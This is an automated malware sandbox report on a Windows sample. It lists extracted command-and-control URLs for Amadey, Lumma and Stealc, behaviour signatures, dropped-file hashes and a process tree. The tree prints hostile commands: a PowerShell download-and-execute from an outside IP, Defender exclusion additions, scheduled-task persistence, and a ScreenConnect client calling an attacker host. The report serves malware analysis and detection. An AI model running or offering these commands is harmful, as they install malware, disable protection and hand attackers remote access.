Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 13:33

General

  • Target

    2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    8c87bad579d801bb7bea5acc51e8fe5d

  • SHA1

    78b3bdaad59a371cf44e709e94ec00ccdc05421c

  • SHA256

    dae649137a35a584025e94fee43e229a06818d9f9e600dd9d4a6917b2e01b6cb

  • SHA512

    6fb9a96f6a83e42ae8be6b1ea00ba8417628a38e81654190f37602de36ee2ff6f1c7843eb9acd6991f254a5edfd5efc42b74af144a66fbb35b7fb410ca7692dc

  • SSDEEP

    24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8a0Su:ATvC/MTQYxsWR7a0S

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 3 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 12 IoCs
  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 18 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 41 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 47 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_8c87bad579d801bb7bea5acc51e8fe5d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3060
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 5ri88maP28C /tr "mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1736
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 5ri88maP28C /tr "mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2340
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\Qd8riT38L.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Users\Admin\AppData\Local\TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE
          "C:\Users\Admin\AppData\Local\TempXTPC36KUFCC4457EXMNZBIOYS8DJALGB.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1756
            • C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe
              "C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2956
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2064
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:956
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:844
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1952
            • C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe
              "C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2672
            • C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe
              "C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2176
            • C:\Users\Admin\AppData\Local\Temp\10381470101\75c64a5fe4.exe
              "C:\Users\Admin\AppData\Local\Temp\10381470101\75c64a5fe4.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1784
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2492
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1692
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2888
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:392
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2364
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:2348
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:1704
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.0.1495202775\702543554" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1260 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1defe146-567b-4be4-841f-f8fd9f4fce5f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1368 45f2758 gpu
                      9⤵
                        PID:1800
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.1.164726948\339993801" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1516 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ef59b93c-a630-4af4-b6e9-02233eb89de0} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1532 44fb458 socket
                        9⤵
                          PID:568
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.2.71304211\1123630119" -childID 1 -isForBrowser -prefsHandle 1892 -prefMapHandle 1888 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6320b6e7-54ff-4297-8a30-f35650186033} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1868 18e4f558 tab
                          9⤵
                            PID:2592
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.3.242283499\1856710447" -childID 2 -isForBrowser -prefsHandle 2740 -prefMapHandle 2736 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b800ee98-7bb0-4cb0-8a77-959133ce9a3f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2752 e64558 tab
                            9⤵
                              PID:2996
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.4.855048009\1879785595" -childID 3 -isForBrowser -prefsHandle 3812 -prefMapHandle 3808 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0aafb9d-fdde-4b67-ab73-6dc3b0d77f50} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3824 1eeb9e58 tab
                              9⤵
                                PID:564
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.5.1251832731\127858260" -childID 4 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d2d8319-a3fd-4b52-8746-d50862ecfd6b} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3920 1eeb9858 tab
                                9⤵
                                  PID:1412
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.6.1973818061\1873793797" -childID 5 -isForBrowser -prefsHandle 4112 -prefMapHandle 4116 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58f77f72-5461-4a0e-b4f4-e19890cf6b35} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 4100 1ef9ab58 tab
                                  9⤵
                                    PID:1384
                            • C:\Users\Admin\AppData\Local\Temp\10381480101\9d780b6f18.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381480101\9d780b6f18.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3352
                            • C:\Users\Admin\AppData\Local\Temp\10381490101\78577724d0.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381490101\78577724d0.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3624
                            • C:\Users\Admin\AppData\Local\Temp\10381500101\d22426bcf1.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381500101\d22426bcf1.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3880
                            • C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Loads dropped DLL
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2088
                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                "C:\Users\Admin\AppData\Local\Temp\10381510101\532fd2aeef.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:1700
                            • C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Loads dropped DLL
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3848
                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                "C:\Users\Admin\AppData\Local\Temp\10381520101\a4bb584db7.exe"
                                7⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3688
                            • C:\Users\Admin\AppData\Local\Temp\10381530101\70d75e69ad.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381530101\70d75e69ad.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3180
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 3180 -s 64
                                7⤵
                                • Loads dropped DLL
                                PID:3216
                            • C:\Users\Admin\AppData\Local\Temp\10381540101\4aa41be87a.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381540101\4aa41be87a.exe"
                              6⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3368
                            • C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3864
                              • C:\Windows\SysWOW64\msiexec.exe
                                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
                                7⤵
                                • Enumerates connected drives
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                PID:3912
                            • C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
                              6⤵
                                PID:936
                    • C:\Windows\explorer.exe
                      explorer.exe
                      1⤵
                      • Boot or Logon Autostart Execution: Active Setup
                      • Modifies registry class
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2236
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {ACAFAF6F-9758-4683-BA43-61C573FFBF3B} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2156
                      • C:\Users\Admin\AppData\Local\Temp\smss.exe
                        C:\Users\Admin\AppData\Local\Temp\smss.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1996
                      • C:\Users\Admin\AppData\Local\Temp\smss.exe
                        C:\Users\Admin\AppData\Local\Temp\smss.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2196
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      1⤵
                      • Enumerates connected drives
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3920
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding C1A7DC85C0D0DE76A5B67DE9BA51B217 C
                        2⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:3676
                        • C:\Windows\SysWOW64\rundll32.exe
                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIC69A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259573448 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                          3⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:3740
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding 710C335EDB53381774964B0F5FF8D0CE
                        2⤵
                          PID:1020
                        • C:\Windows\syswow64\MsiExec.exe
                          C:\Windows\syswow64\MsiExec.exe -Embedding DB8C4DC25386892C1B9CF4859F2436E1 M Global\MSI0000
                          2⤵
                            PID:3864
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                            PID:1744
                          • C:\Windows\system32\DrvInst.exe
                            DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005A8" "00000000000005DC"
                            1⤵
                              PID:1448
                            • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
                              "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=ad6ebbe3-e789-4058-b8c7-24af2c9e25ee&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"
                              1⤵
                                PID:3752

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8452S9S3\service[1].htm

                                Filesize

                                1B

                                MD5

                                cfcd208495d565ef66e7dff9f98764da

                                SHA1

                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                SHA256

                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                SHA512

                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp

                                Filesize

                                22KB

                                MD5

                                dbb90d8ccf95ca2e25467dda4deae171

                                SHA1

                                9629d09401e1745410d91a38c7dc2b4b1bcc53d7

                                SHA256

                                a9e07aea216fe69a21c3eb1f24e94f27b320374cde9385c4bb15823cd5ef9758

                                SHA512

                                94ae715d4ed903b94af6482ec6bdcc9c080aa6603a7b108d6bc5870b8e399ee958b30ea0fe5bde92ff410ff8e9795e672012bd4293e96ac3c55a2d38b42db096

                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                Filesize

                                15KB

                                MD5

                                96c542dec016d9ec1ecc4dddfcbaac66

                                SHA1

                                6199f7648bb744efa58acf7b96fee85d938389e4

                                SHA256

                                7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                SHA512

                                cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                              • C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe

                                Filesize

                                136KB

                                MD5

                                600c5edb9777e1d279b5f7abd9f6d3ac

                                SHA1

                                8bc7c951070c242d74cf881b0d69ebbe9c9f087d

                                SHA256

                                2b180bc8878d513a9ecaabf45f011c97e3dd5c2c57dfdddfc26bc3ac13dc47cf

                                SHA512

                                7349ee35c76e96b359e39a8a3bab2c026631835a7f7b150f07112e875befa072586a86320f4cce99821e5b5de7ae5d4aed5d6d62a687ec037db7f8fc79f692c7

                              • C:\Users\Admin\AppData\Local\Temp\10381450101\9c32fb17b4.exe

                                Filesize

                                2.9MB

                                MD5

                                87e1ef76fcf8436dd835e12c500e4e83

                                SHA1

                                e639e7352e4a21263120988a318f5e9b3dd8a275

                                SHA256

                                357019ac110c232d6ee370d8ef02822c5963e72584ec7f897381679fe7ab38da

                                SHA512

                                ab8e05c697f8f332c847e6661623b8f08d0adbbd8e5860accb2a608d1b896c031ea4b840cff4332637710e755108442fa9533375cfb1ec8164958e48acc1ccf3

                              • C:\Users\Admin\AppData\Local\Temp\10381460101\0eb65cfefc.exe

                                Filesize

                                1.7MB

                                MD5

                                5dd55b0c5021bf7a1abd5dcff2598695

                                SHA1

                                d523df50545388ae0465ed4ef58e05c387b38d8d

                                SHA256

